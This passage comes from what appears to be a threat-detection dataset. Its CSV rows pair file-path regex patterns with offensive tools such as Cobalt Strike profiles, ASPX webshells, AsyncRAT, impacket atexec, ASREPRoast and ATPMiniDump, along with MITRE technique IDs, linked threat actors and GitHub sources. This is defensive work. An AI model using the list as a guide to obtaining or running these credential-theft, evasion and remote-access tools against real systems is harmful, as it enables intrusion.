"*/asprox.profile*",".{0,1000}\/asprox\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","1531","425","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z","5417"
"*/ASPXspy2.aspx*",".{0,1000}\/ASPXspy2\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5418"
"*/AspxSpy2014Final.aspx*",".{0,1000}\/AspxSpy2014Final\.aspx.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","1","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","5419"
"*/ASRenum.cpp*",".{0,1000}\/ASRenum\.cpp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","N/A","10","10","153","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z","5420"
"*/ASRenum.cs*",".{0,1000}\/ASRenum\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","N/A","10","10","153","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z","5421"
"*/ASRenum-BOF*",".{0,1000}\/ASRenum\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that identifies Attack Surface Reduction (ASR) rules. actions. and exclusion locations","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/mlcsec/ASRenum-BOF","1","1","N/A","N/A","10","10","153","17","2024-03-01T14:03:44Z","2022-12-28T14:41:02Z","5422"
"*/ASREPRoast*",".{0,1000}\/ASREPRoast.{0,1000}","offensive_tool_keyword","ASREPRoast","Project that retrieves crackable hashes from KRB5 AS-REP responses for users without kerberoast preauthentication enabled. ","T1558.003","TA0006","N/A","N/A","Credential Access","https://github.com/HarmJ0y/ASREPRoast","1","1","N/A","N/A","N/A","3","202","58","2018-09-25T03:26:00Z","2017-01-14T21:07:57Z","5423"
"*/asreproast_hashes_*.txt*",".{0,1000}\/asreproast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","5424"
"*/ASREProastables.txt*",".{0,1000}\/ASREProastables\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","#linux","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","5425"
"*/assets/bin2uuids_file.py*",".{0,1000}\/assets\/bin2uuids_file\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/RCStep/CSSG","1","1","N/A","N/A","10","10","654","112","2025-01-08T23:11:49Z","2021-01-12T14:39:06Z","5426"
"*/assets/wraith-scripts/*",".{0,1000}\/assets\/wraith\-scripts\/.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","5427"
"*/AsStrongAsFuck.exe*",".{0,1000}\/AsStrongAsFuck\.exe.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","5430"
"*/asstrongasfuck.py*",".{0,1000}\/asstrongasfuck\.py.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","1","N/A","packer bundled","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","5431"
"*/AsyncRAT-C%23*",".{0,1000}\/AsyncRAT\-C\%23.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","5432"
"*/AsyncRAT-C-Sharp*",".{0,1000}\/AsyncRAT\-C\-Sharp.{0,1000}","offensive_tool_keyword","AsyncRAT-C-Sharp","Open-Source Remote Administration Tool For Windows C# (RAT)","T1021.002 - T1056.001 - T1113 - T1133 - T1041 - T1555 - T1129 - T1564.001","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009","N/A","TA2541 - APT-C-36 - Earth Berberoka - Operation Comando - TA558","C2","https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp","1","1","N/A","N/A","10","10","2484","754","2023-10-16T21:41:12Z","2019-01-19T04:02:26Z","5433"
"*/asyncssh_server.py*",".{0,1000}\/asyncssh_server\.py.{0,1000}","offensive_tool_keyword","MaccaroniC2","A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.","T1090 - T1059.003","TA0011 - TA0002","N/A","N/A","C2","https://github.com/CalfCrusher/MaccaroniC2","1","1","N/A","N/A","10","10","76","16","2023-06-27T17:43:59Z","2023-05-21T13:33:48Z","5434"
"*/atexec.py*",".{0,1000}\/atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5435"
"*/atexec.py*",".{0,1000}\/atexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","5436"
"*/atexec-pro.git*",".{0,1000}\/atexec\-pro\.git.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","1","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","5437"
"*/atexec-pro.py*",".{0,1000}\/atexec\-pro\.py.{0,1000}","offensive_tool_keyword","atexec-pro","Fileless atexec for lateral movement","T1021.002 - T1105","TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Ridter/atexec-pro","1","1","N/A","N/A","10","4","366","45","2024-03-28T03:36:50Z","2024-03-27T09:15:00Z","5438"
"*/Athena-*.zip*",".{0,1000}\/Athena\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5439"
"*/Athena.csproj*",".{0,1000}\/Athena\.csproj.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5440"
"*/Athena.exe*",".{0,1000}\/Athena\.exe.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5441"
"*/Athena.Profiles.*.cs*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5442"
"*/Athena.Profiles.*.exe*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5443"
"*/Athena.Profiles.*.py*",".{0,1000}\/Athena\.Profiles\..{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5444"
"*/Athena.sln*",".{0,1000}\/Athena\.sln.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5445"
"*/Athena/Assembly/*.*",".{0,1000}\/Athena\/Assembly\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5446"
"*/Athena/Commands/*.*",".{0,1000}\/Athena\/Commands\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5447"
"*/athena/mythic*",".{0,1000}\/athena\/mythic.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5448"
"*/athena_utils/*.py*",".{0,1000}\/athena_utils\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5449"
"*/AthenaPlugins/bin/*",".{0,1000}\/AthenaPlugins\/bin\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","#linux","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5450"
"*/AthenaSMB/*",".{0,1000}\/AthenaSMB\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5451"
"*/AthenaTests/*.*",".{0,1000}\/AthenaTests\/.{0,1000}\..{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","5452"
"*/AtlasReaper.git*",".{0,1000}\/AtlasReaper\.git.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","N/A","3","3","255","28","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z","5453"
"*/atomizer.py*",".{0,1000}\/atomizer\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061 - T1621","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","#linux","N/A","9","10","1491","269","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z","5456"
"*/AtomLdr.git*",".{0,1000}\/AtomLdr\.git.{0,1000}","offensive_tool_keyword","AtomLdr","A DLL loader with advanced evasive features","T1071.004 - T1574.001 - T1574.002 - T1071.001 - T1055.003 - T1059.003 - T1546.003 - T1574.003 - T1574.004 - T1059.001 - T1569.002","TA0011 - TA0006 - TA0002 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/NUL0x4C/AtomLdr","1","1","N/A","N/A","N/A","8","712","91","2023-02-26T19:57:09Z","2023-02-26T17:59:26Z","5457"
"*/atomsilo.hta*",".{0,1000}\/atomsilo\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","5458"
"*/ATPMiniDump.exe*",".{0,1000}\/ATPMiniDump\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","5459"
"*/ATPMiniDump.git*",".{0,1000}\/ATPMiniDump\.git.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","5460"
"*/attackercan/*",".{0,1000}\/attackercan\/.{0,1000}","offensive_tool_keyword","Github Username","github Penetration tester repo hosting malicious code","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/attackercan/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","5461"
